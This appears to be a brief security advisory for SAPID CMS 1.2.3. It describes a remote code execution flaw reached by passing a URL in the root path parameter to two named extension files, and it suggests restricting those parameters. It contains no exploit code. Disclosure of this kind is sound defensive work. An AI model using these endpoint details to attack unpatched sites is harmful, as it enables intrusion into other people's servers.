Opa Yong

**Name of the Vulnerable Software and Affected Versions** SAPID CMS version 1.2.3 **Description** The issue allows remote attackers to execute arbitrary PHP code. This can be achieved via a URL in the `root path` parameter to specific API endpoints, such as "usr/extensions/get tree.inc.php" or "usr/extensions/get infochannel.inc.php". **Recommendations** For SAPID CMS version 1.2.3, consider restricting access to the `GLOBALS[root path]` and `root path` parameters in the affected API endpoints until a patch is available. As a temporary workaround, avoid using these parameters in "usr/extensions/get tree.inc.php" and "usr/extensions/get infochannel.inc.php" to minimize the risk of exploitation.